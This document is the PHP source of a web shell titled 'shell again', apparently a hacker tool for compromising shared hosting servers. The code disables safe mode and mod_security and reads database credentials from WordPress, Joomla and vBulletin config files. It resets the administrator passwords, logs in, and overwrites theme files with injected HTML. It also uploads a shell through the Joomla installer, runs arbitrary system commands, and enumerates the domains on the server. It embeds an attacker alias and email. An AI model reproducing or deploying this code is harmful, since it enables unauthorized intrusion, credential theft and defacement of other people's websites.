shell again

1. <?php
2. @ini_set('error_log',NULL);
3.  
4. @ini_set('log_errors',0);
5.  
6. @ini_set('max_execution_time',0);
7.  
8. @set_time_limit(0);
9.  
10. @set_magic_quotes_runtime(0);
11.  
12. $enable_wp = true;
13.  
14. $enable_joomla = true;
15.  
16. $enable_vb = false;
17.  
18. $enable_phpbb = false;
19.  
20. $enable_ipb = false;
21.  
22. if(isset($_SESSION['safechk'])){
23.  
24. if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
25.  
26. $byphp = "safe_mode = Off
27.  
28. disable_functions =
29. NONE
30.  
31. safe_mode_gid = OFF
32.  
33. open_basedir = OFF
34.  
35. allow_url_fopen = On";
36.  
37. $byht = "<IfModule mod_security.c>
38.  
39. SecFilterEngine Off
40.  
41. SecFilterScanPOST Off
42.  
43. SecFilterCheckURLEncoding Off
44.  
45. SecFilterCheckUnicodeEncoding Off
46.  
47. </IfModule>";
48.  
49. file_put_contents("php.ini",$byphp);
50.  
51. file_put_contents(".htaccess",$byht);
52.  
53. $_SESSION['safechk'] = "done";
54.  
55. die("PHP Safe Mode ByPassed. Please Refresh This page");
56.  
57. }
58.  
59. }
60.  
61. function convertByte($s) {
62.  
63. if($s >= 1073741824)
64.  
65. return sprintf('%1.2f',$s / 1073741824 ).' GB';
66.  
67. elseif($s >= 1048576)
68.  
69. return sprintf('%1.2f',$s / 1048576 ) .' MB';
70.  
71. elseif($s >= 1024)
72.  
73. return sprintf('%1.2f',$s / 1024 ) .' KB';
74.  
75. else
76.  
77. return $s .' B';
78.  
79. }
80.  
81. function curPageURL() {
82.  
83. $pageURL = 'http';
84.  
85. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
86.  
87. $pageURL .= "://";
88.  
89. if ($_SERVER["SERVER_PORT"] != "80") {
90.  
91. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
92.  
93. }else {
94.  
95. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
96.  
97. }
98.  
99. return $pageURL;
100.  
101. }
102.  
103. function chkDis($link,$str){
104.  
105. $lol = get_headers($link,1);
106.  
107. if(strpos($lol[0],"200")){
108.  
109. $nan = file_get_contents($link);
110.  
111. if(strpos($nan,$str)){
112.  
113. return true;
114.  
115. }else{return false;}
116.  
117. }else{return false;}
118.  
119. }
120.  
121. function getDnamed(){
122.  
123. if(is_readable("/var/named")){
124.  
125. $list = scandir("/var/named");
126.  
127. foreach($list as $domain){
128.  
129. if(strpos($domain,".db")){
130.  
131. $i += 1;
132.  
133. $domain = str_replace('.db','',$domain);
134.  
135. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
136.  
137. $dn[$owner['name']] = $domain;
138.  
139. }
140.  
141. }
142.  
143. }
144.  
145. return $dn;
146.  
147. }
148.  
149. function chkSys($link){
150.  
151. $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
152.  
153. "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
154.  
155. );
156.  
157. foreach($sys_arr as $k=>$dan){
158.  
159. if(chkDis($link.$dan['l'],$dan['s'])){
160.  
161. return array('link'=>$link.$dan['l'],'cms'=>$k);
162.  
163. }
164.  
165. }
166.  
167. }
168.  
169. function EloFind($str,$start,$end){
170.  
171. $len = strlen($str);
172.  
173. $start_pos = (strpos($str,$start) +strlen($start));
174.  
175. $str = substr($str,$start_pos);
176.  
177. $end_pos = strpos($str,$end);
178.  
179. $str = substr($str,0,$end_pos);
180.  
181. return $str;
182.  
183. }
184.  
185. function GetPage($url,$cookie,$post = null,$head = true) {
186.  
187. $ch = curl_init();
188.  
189. curl_setopt($ch,CURLOPT_URL,$url);
190.  
191. curl_setopt($ch,CURLOPT_HEADER,$head);
192.  
193. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
194.  
195. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
196.  
197. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
198.  
199. curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
200.  
201. curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
202.  
203. curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
204.  
205. curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
206.  
207. If ($post != NULL){
208.  
209. curl_setopt($ch,CURLOPT_POST,1);
210.  
211. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
212.  
213. }
214.  
215. $urlPage = curl_exec($ch);
216.  
217. if(curl_errno($ch)){
218.  
219. echo curl_error($ch);
220.  
221. }
222.  
223. curl_close($ch);
224.  
225. return($urlPage);
226.  
227. }
228.  
229. function throwErr($str){
230.  
231. $arr = array("status"=>"error","msg"=>$str);
232.  
233. die(json_encode($arr));
234.  
235. }
236.  
237. function add2file($file,$str){
238.  
239. if(file_exists($file)){
240.  
241. $do = file_get_contents($file);
242.  
243. if(!strpos($do,$str)){
244.  
245. file_put_contents($file,$str,FILE_APPEND);
246.  
247. }
248.  
249. }else{
250.  
251. file_put_contents($file,$str,FILE_APPEND);
252.  
253. }
254.  
255. }
256.  
257. function doXploitWP($cnf,$html,$npass){
258.  
259. $success = false;
260.  
261. $str = file_get_contents($cnf);
262.  
263. if(preg_match('%DB_USER%',$str)){
264.  
265. $username=EloFind($str,"define('DB_USER', '","');");
266.  
267. $password=EloFind($str,"define('DB_PASSWORD', '","');");
268.  
269. $dbname=EloFind($str,"define('DB_NAME', '","');");
270.  
271. $prefix=EloFind($str,"table_prefix  = '","'");
272.  
273. $link=mysql_connect("localhost",$username,$password) ;
274.  
275. if ($link) {
276.  
277. mysql_select_db($dbname,$link) ;
278.  
279. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
280.  
281. $req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
282.  
283. $data = mysql_fetch_array($req);
284.  
285. $site_url=$data["option_value"];
286.  
287. }else{
288.  
289. throwErr("Mysql Fail");
290.  
291. }
292.  
293. $status['site'] = $site_url;
294.  
295. $cookie = 'cookie/'.md5($cnf).'.txt';
296.  
297. @unlink($cookie);
298.  
299. $logged_in = true;
300.  
301. $url = $site_url."/wp-login.php";
302.  
303. $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
304.  
305. $logme = GetPage($url,$cookie,$postme);
306.  
307. if(!preg_match('%logout%',$logme)){
308.  
309. file_put_contents("login.txt",$site_url.$logme);
310.  
311. throwErr("Login Error");
312.  
313. }
314.  
315. if($logged_in){
316.  
317. $url = $site_url."/wp-admin/theme-editor.php";
318.  
319. $themeditor = GetPage($url,$cookie,null);
320.  
321. $nola = explode(Chr(10),$themeditor);
322.  
323. foreach($nola as $nline){
324.  
325. if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
326.  
327. $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
328.  
329. }
330.  
331. }
332.  
333. if(is_array($modify)){
334.  
335. foreach($modify as $met=>$indfile){
336.  
337. $nri = str_replace('.','_',$met);
338.  
339. $nri = "n".$nri;
340.  
341. if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
342.  
343. $indfile =str_replace("&amp;","&",$indfile);
344.  
345. $url = trim($site_url."/wp-admin/".$indfile);
346.  
347. $themepage = GetPage($url,$cookie,"");
348.  
349. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
350.  
351. $_file = EloFind($themepage,'name="file" value="','"');
352.  
353. $nfile = explode('themes',$_file);
354.  
355. $jfile = $site_url."/wp-content/themes".end($nfile);
356.  
357. $url = $site_url."/wp-admin/theme-editor.php";
358.  
359. $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
360.  
361. $themedied = GetPage($url,$cookie,$postme);
362.  
363. if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
364.  
365. if(!$success){
366.  
367. add2file("wp_site.txt",$jfile.Chr(10));
368.  
369. }
370.  
371. $success = true;
372.  
373. if($met == "index.php"){
374.  
375. add2file("wp_index.txt",$site_url.Chr(10));
376.  
377. }
378.  
379. }else{
380.  
381. $error = true;
382.  
383. }
384.  
385. }
386.  
387. }
388.  
389. }else{
390.  
391. throwErr("No file found");
392.  
393. }
394.  
395. if($success){
396.  
397. $url = trim($site_url."/wp-admin/profile.php");
398.  
399. $themepage = GetPage($url,$cookie,"");
400.  
401. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
402.  
403. $url = trim($site_url."/wp-admin/profile.php");
404.  
405. $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=cyberserkers@gmail.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
406.  
407. $themepage = GetPage($url,$cookie,$postme);
408.  
409. $status['status'] = "success";
410.  
411. die(json_encode($status));
412.  
413. }
414.  
415. else{
416.  
417. if($error){
418.  
419. throwErr("Could't Update the file");
420.  
421. }else{
422.  
423. throwErr("Selected file not found");
424.  
425. }
426.  
427. }
428.  
429. }
430.  
431. }else{
432.  
433. throwErr("Config not found");
434.  
435. }
436.  
437. return true;
438.  
439. }
440.  
441. function doXploitJM($cnf,$html,$npass){
442.  
443. function joomlaCom($site_url,$cookie,$site){
444.  
445. if($_POST['com_install'] == "on"){
446.  
447. $url = $site_url ."/index.php?option=com_installer";
448.  
449. $compage = GetPage($url,$cookie);
450.  
451. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
452.  
453. $hash = $dhash[1];
454.  
455. preg_match_all('#value="/(.*?)"#s',$compage,$path);
456.  
457. foreach($path[0] as $pathx){
458.  
459. $pathx=ereg_replace('value="','',$pathx);
460.  
461. $pathx=ereg_replace('"','',$pathx);
462.  
463. }
464.  
465. $dir = getcwd()."/azzatssins.html";
466.  
467. $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
468.  
469. $url = $site_url ."/index.php?option=com_installer";
470.  
471. $com_shell = GetPage($url,$cookie,$postme);
472.  
473. if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
474.  
475. add2file("jm_site.txt",$site."/tmp/azzatssins.html".Chr(10));
476.  
477. $status['site'] = $site."/tmp/azzatssins.html";
478.  
479. $status['status'] = "success";
480.  
481. die(json_encode($status));
482.  
483. }else{
484.  
485. return false;
486.  
487. }
488.  
489. }
490.  
491. return true;
492.  
493. }
494.  
495. $str = file_get_contents($cnf);
496.  
497. if(preg_match('%(JConfig|mosConfig)%',$str)){
498.  
499. if(preg_match('%JConfig%',$str)){
500.  
501. $username=EloFind($str,"\$user = '","'");
502.  
503. $password=EloFind($str,"\$password = '","'");
504.  
505. $dbname=EloFind($str,"\$db = '","'");
506.  
507. $prefix=EloFind($str,"\$dbprefix = '","'");
508.  
509. $pwd = md5($npass);
510.  
511. if($_POST['domain'] != "..."){
512.  
513. $site_url = $_POST['domain'];
514.  
515. $site_url = "http://".$site_url;
516.  
517. }else{
518.  
519. $mailto = EloFind($str,"\$mailfrom = '","'");
520.  
521. $siteul = explode('@',$mailto);
522.  
523. $site_url = "http://".$siteul[1];
524.  
525. }
526.  
527. }elseif(preg_match('%mosConfig%',$str)){
528.  
529. $username=EloFind($str,"\$mosConfig_user = '","'");
530.  
531. $password=EloFind($str,"\$mosConfig_password = '","'");
532.  
533. $dbname=EloFind($str,"\$mosConfig_db = '","'");
534.  
535. $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
536.  
537. $pwd = md5($npass);
538.  
539. if($_POST['domain'] != "..."){
540.  
541. $site_url = $_POST['domain'];
542.  
543. $site_url = "http://".$site_url;
544.  
545. }else{
546.  
547. $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
548.  
549. $siteul = explode('@',$mailto);
550.  
551. $site_url = "http://".$siteul[1];
552.  
553. }
554.  
555. }
556.  
557. $site = $site_url;
558.  
559. $site_url = $site_url."/administrator/";
560.  
561. $cookie = 'cookie/'.md5($cnf).'.txt';
562.  
563. @unlink($cookie);
564.  
565. $link=mysql_connect("localhost",$username,$password) ;
566.  
567. if ($link) {
568.  
569. mysql_select_db($dbname,$link);
570.  
571. $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
572.  
573. $doit =mysql_query("SELECT * from  `".$prefix."extensions` ");
574.  
575. if($doit){
576.  
577. if($_POST['ignore_def'] == "on"){
578.  
579. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='0'");
580.  
581. $data = mysql_fetch_array($req);
582.  
583. $template_name=$data["template"];
584.  
585. if(strlen($template_name) <1){
586.  
587. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
588.  
589. $data = mysql_fetch_array($req);
590.  
591. $template_name=$data["template"];
592.  
593. }
594.  
595. }
596.  
597. else{
598.  
599. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
600.  
601. $data = mysql_fetch_array($req);
602.  
603. $template_name=$data["template"];
604.  
605. }
606.  
607. $req =mysql_query("SELECT * from  `".$prefix."extensions` WHERE name='".$template_name."'");
608.  
609. $data = mysql_fetch_array($req);
610.  
611. $template_id=$data["extension_id"];
612.  
613. $url = $site_url ."index.php";
614.  
615. $login_page = GetPage($url,$cookie);
616.  
617. $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
618.  
619. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
620.  
621. $hash = $dhash[1];
622.  
623. $url = $site_url ."index.php";
624.  
625. $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
626.  
627. $logginin = GetPage($url,$cookie,$postme);
628.  
629. if(preg_match('%logout|index2\.php%',$logginin)){
630.  
631. $logged_in = true;
632.  
633. }
634.  
635. if(!$logged_in){
636.  
637. file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
638.  
639. throwErr("Login Error");
640.  
641. }
642.  
643. if($logged_in){
644.  
645. joomlaCom($site_url,$cookie,$site);
646.  
647. $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
648.  
649. $themepage = GetPage($url,$cookie);
650.  
651. if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
652.  
653. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
654.  
655. $hash = $dhash[1];
656.  
657. $url = $site_url."/index.php?option=com_templates&layout=edit";
658.  
659. $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
660.  
661. $themeedit = GetPage($url,$cookie,$postme);
662.  
663. if(preg_match('%class=\"message message\"%',$themeedit)){
664.  
665. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
666.  
667. add2file("jm_index.txt",$site.Chr(10));
668.  
669. if($_POST['ignore_def'] == "on"){
670.  
671. $status['site'] = $site."/templates/".$template_name."/index.php";
672.  
673. }else{
674.  
675. $status['site'] = $site;
676.  
677. }
678.  
679. $status['status'] = "success";
680.  
681. die(json_encode($status));
682.  
683. }
684.  
685. else{
686.  
687. throwErr("Update failed");
688.  
689. }
690.  
691. }
692.  
693. else{
694.  
695. throwErr("Index not found");
696.  
697. }
698.  
699. }
700.  
701. }else{
702.  
703. $req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
704.  
705. $data = mysql_fetch_array($req);
706.  
707. $template_name=$data["template"];
708.  
709. $url = $site_url ."index.php";
710.  
711. $login_page = GetPage($url,$cookie);
712.  
713. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
714.  
715. $hash = $dhash[1];
716.  
717. $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
718.  
719. $url = $site_url ."index.php";
720.  
721. $logginin = GetPage($url,$cookie,$postme);
722.  
723. if(preg_match('%logout|index2\.php%',$logginin)){
724.  
725. $logged_in = true;
726.  
727. }
728.  
729. if(!$logged_in){
730.  
731. file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
732.  
733. throwErr("Login Error");
734.  
735. }
736.  
737. if($logged_in){
738.  
739. joomlaCom($site_url,$cookie,$site);
740.  
741. if(preg_match('%index2\.php%',$logginin)){
742.  
743. $url = $site_url ."index2.php";
744.  
745. $logginin = GetPage($url,$cookie);
746.  
747. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
748.  
749. $hash = $dhash[1];
750.  
751. $url = $site_url ."/index2.php";
752.  
753. $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
754.  
755. $themepage = GetPage($url,$cookie,$postme);
756.  
757. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
758.  
759. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
760.  
761. $hash = $dhash[1];
762.  
763. $url=$site_url."/index2.php";
764.  
765. $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
766.  
767. $themeedit = GetPage($url,$cookie,$postme);
768.  
769. if(preg_match('%Template Manager%',$themeedit)){
770.  
771. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
772.  
773. add2file("jm_index.txt",$site.Chr(10));
774.  
775. $status['site'] = $site;
776.  
777. $status['status'] = "success";
778.  
779. die(json_encode($status));
780.  
781. }
782.  
783. else{
784.  
785. file_put_contents("jmupd.txt",$site_url.$themeedit);
786.  
787. throwErr($template_name);
788.  
789. }
790.  
791. }else{
792.  
793. throwErr("Index not found");
794.  
795. }
796.  
797. }
798.  
799. else{
800.  
801. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
802.  
803. $hash = $dhash[1];
804.  
805. $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
806.  
807. $themepage = GetPage($url,$cookie);
808.  
809. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
810.  
811. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
812.  
813. $hash = $dhash[1];
814.  
815. $url=$site_url."/index.php?option=com_templates&layout=edit";
816.  
817. $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
818.  
819. $themeedit = GetPage($url,$cookie,$postme);
820.  
821. if(preg_match('%class=\"message message fade\"%',$themeedit)){
822.  
823. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
824.  
825. add2file("jm_index.txt",$site.Chr(10));
826.  
827. $status['site'] = $site;
828.  
829. $status['status'] = "success";
830.  
831. die(json_encode($status));
832.  
833. }
834.  
835. else{
836.  
837. file_put_contents("jmupd.txt",$site_url.$themeedit);
838.  
839. throwErr($template_name);
840.  
841. }
842.  
843. }else{
844.  
845. throwErr("Index not found");
846.  
847. }
848.  
849. }
850.  
851. }
852.  
853. }
854.  
855. }
856.  
857. else{
858.  
859. throwErr("Mysql Fail");
860.  
861. }
862.  
863. }
864.  
865. else{
866.  
867. throwErr("Config not found");
868.  
869. }
870.  
871. }
872.  
873. function doXploitVB($cnf,$html){
874.  
875. $str = file_get_contents($cnf);
876.  
877. if(preg_match('%vBulletin%',$str)){
878.  
879. $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
880.  
881. $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
882.  
883. $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
884.  
885. $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
886.  
887. $link=mysql_connect("localhost",$username,$password) ;
888.  
889. if ($link) {
890.  
891. mysql_select_db($dbname,$link);
892.  
893. $html = str_replace('"','\\\"',$html);
894.  
895. $query = "UPDATE template SET template = '".$html."'";
896.  
897. $result =@ mysql_query($query);
898.  
899. if($result){
900.  
901. $query = "SELECT * FROM `datastore` WHERE title = 'options'";
902.  
903. $result =@ mysql_query($query);
904.  
905. $data = mysql_fetch_array($result);
906.  
907. $optionz=$data["data"];
908.  
909. $site_url = EloFind($optionz,'"bburl";s:34:"','"');
910.  
911. $status['site'] = $site_url;
912.  
913. $status['status'] = "success";
914.  
915. die(json_encode($status));
916.  
917. }else{
918.  
919. throwErr("Update Failed");
920.  
921. }
922.  
923. }else{
924.  
925. throwErr("Mysql Fail");
926.  
927. }
928.  
929. }else{
930.  
931. throwErr("Config not found");
932.  
933. }
934.  
935. }
936.  
937. function exme($in) {
938.  
939. $out = '';
940.  
941. if (function_exists('exec')) {
942.  
943. @exec($in,$out);
944.  
945. $out = @join("</br>",$out);
946.  
947. }elseif (function_exists('passthru')) {
948.  
949. ob_start();
950.  
951. @passthru($in);
952.  
953. $out = ob_get_clean();
954.  
955. }elseif (function_exists('system')) {
956.  
957. ob_start();
958.  
959. @system($in);
960.  
961. $out = ob_get_clean();
962.  
963. }elseif (function_exists('shell_exec')) {
964.  
965. $out = shell_exec($in);
966.  
967. }elseif (is_resource($f = @popen($in,"r"))) {
968.  
969. $out = "";
970.  
971. while(!@feof($f))
972.  
973. $out .= fread($f,1024);
974.  
975. pclose($f);
976.  
977. }
978.  
979. return $out;
980.  
981. }
982.  
983. if($_POST['ac'] == "secinfo"){
984.  
985. if(is_readable("/etc/named.conf")){
986.  
987. echo '&raquo; /etc/named.conf is readable.<br />';
988.  
989. }else{
990.  
991. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
992.  
993. }
994.  
995. if(is_readable("/etc/passwd")){
996.  
997. echo '&raquo; /etc/passwd is readable.<br />';
998.  
999. }else{
1000.  
1001. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
1002.  
1003. }
1004.  
1005. if(is_readable("/etc/valiases")){
1006.  
1007. echo '&raquo; /etc/valiases exists';
1008.  
1009. if(is_array(scandir("/etc/valiases"))){
1010.  
1011. echo ' & scanable';
1012.  
1013. }
1014.  
1015. echo '.<br />';
1016.  
1017. }else{
1018.  
1019. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
1020.  
1021. }
1022.  
1023. if(is_readable("/var/named")){
1024.  
1025. echo '&raquo; /var/named exists';
1026.  
1027. if(is_array(scandir("/var/named"))){
1028.  
1029. echo ' & scanable';
1030.  
1031. }
1032.  
1033. echo '.<br />';
1034.  
1035. }else{
1036.  
1037. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
1038.  
1039. }
1040.  
1041. if(ini_get('disable_functions')){
1042.  
1043. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
1044.  
1045. }
1046.  
1047. if(function_exists("symlink")){
1048.  
1049. echo '&raquo; Symlinking allowed<br />';
1050.  
1051. }else{
1052.  
1053. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
1054.  
1055. }
1056.  
1057. if(is_writable("/var/tmp")){
1058.  
1059. echo '&raquo; /var/tmp folder is writable<br />';
1060.  
1061. }
1062.  
1063. if(is_readable('/var/log')){
1064.  
1065. echo '&raquo; /var/log folder is readable<br />';
1066.  
1067. }
1068.  
1069. die();
1070.  
1071. }
1072.  
1073. elseif($_POST['ac'] == "sysinfo"){
1074.  
1075. echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
1076.  
1077. echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
1078.  
1079. echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
1080.  
1081. $ssys = "None";
1082.  
1083. if(is_dir("/usr/local/cpanel")){
1084.  
1085. $ssys = "Running On Cpanel";
1086.  
1087. }elseif(is_dir("/usr/local/directadmin")){
1088.  
1089. $ssys = "Running On Directadmin";
1090.  
1091. }
1092.  
1093. echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
1094.  
1095. if(function_exists("disk_total_space")){
1096.  
1097. echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
1098.  
1099. }
1100.  
1101. echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
1102.  
1103. die();
1104.  
1105. }
1106.  
1107. elseif($_POST['ac'] == "browse"){
1108.  
1109. error_reporting(0);
1110.  
1111. if($_POST['path'] != ""){
1112.  
1113. $path = $_POST['path'];
1114.  
1115. }else{
1116.  
1117. $path = getcwd();
1118.  
1119. }
1120.  
1121. $filez = scandir($path);
1122.  
1123. $q = 2;
1124.  
1125. foreach($filez as $mfile){
1126.  
1127. if($q == 2){$q = 1;}else{$q = 2;}
1128.  
1129. $npath = $_POST['path'].$mfile;
1130.  
1131. $stat = stat($npath);
1132.  
1133. $usr = posix_getpwuid($stat['uid']);
1134.  
1135. $grp = posix_getpwuid($stat['gid']);
1136.  
1137. if(is_dir($npath)){
1138.  
1139. $size = "Dir";
1140.  
1141. }else{
1142.  
1143. $size = convertByte($stat['size']);
1144.  
1145. }
1146.  
1147. $fperm = substr(sprintf('%o',fileperms($npath)),-4);
1148.  
1149. if(!$fperm){
1150.  
1151. $fperm = "<font color='red'>Restricted</font>";
1152.  
1153. }elseif(is_writeable($npath)){
1154.  
1155. $fperm = "<font color='#28FE14'>".$fperm."</font>";
1156.  
1157. }elseif(is_readable($npath)){
1158.  
1159. $fperm = "<font color='yellow'>".$fperm."</font>";
1160.  
1161. }
1162.  
1163. echo '<div class="filetable">
1164.  
1165. <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
1166.  
1167. <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
1168.  
1169. <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
1170.  
1171. <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
1172.  
1173. <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
1174.  
1175. <div class="tblbx'.$q.'" style="width:80px;">Action</div>
1176.  
1177. </div>';
1178.  
1179. }
1180.  
1181. die();
1182.  
1183. }
1184.  
1185. elseif($_POST['ac'] == "chknamed"){
1186.  
1187. error_reporting(0);
1188.  
1189. if(is_readable("/etc/named.conf")){
1190.  
1191. $named = file_get_contents("/etc/named.conf");
1192.  
1193. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1194.  
1195. foreach($domains[1] as $domain){
1196.  
1197. $domain = trim($domain);
1198.  
1199. $i += 1;
1200.  
1201. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1202.  
1203. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
1204.  
1205. }
1206.  
1207. echo "Total Domains Found: ".$i."<br />".$dn;
1208.  
1209. die();
1210.  
1211. }
1212.  
1213. elseif(is_readable("/etc/valiases")){
1214.  
1215. $list = scandir("/etc/valiases");
1216.  
1217. foreach($list as $domain){
1218.  
1219. $i += 1;
1220.  
1221. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1222.  
1223. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
1224.  
1225. }
1226.  
1227. echo "Total Domains Found: ".$i."<br />".$dn;
1228.  
1229. die();
1230.  
1231. }
1232.  
1233. elseif(is_readable("/var/named")){
1234.  
1235. $list = scandir("/var/named");
1236.  
1237. foreach($list as $domain){
1238.  
1239. if(strpos($domain,".db")){
1240.  
1241. $i += 1;
1242.  
1243. $domain = str_replace('.db','',$domain);
1244.  
1245. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1246.  
1247. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
1248.  
1249. }
1250.  
1251. }
1252.  
1253. echo "Total Domains Found: ".$i."<br />".$dn;
1254.  
1255. die();
1256.  
1257. }
1258.  
1259. else{
1260.  
1261. die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
1262.  
1263. }
1264.  
1265. }
1266.  
1267. elseif($_POST['ac'] == "safebypass"){
1268.  
1269. $byphp = "safe_mode = Off
1270.  
1271. disable_functions =
1272. NONE
1273.  
1274. safe_mode_gid = OFF
1275.  
1276. open_basedir = OFF
1277.  
1278. allow_url_fopen = On";
1279.  
1280. $byht = "<IfModule mod_security.c>
1281.  
1282. SecFilterEngine Off
1283.  
1284. SecFilterScanPOST Off
1285.  
1286. SecFilterCheckURLEncoding Off
1287.  
1288. SecFilterCheckUnicodeEncoding Off
1289.  
1290. </IfModule>";
1291.  
1292. file_put_contents("php.ini",$byphp);
1293.  
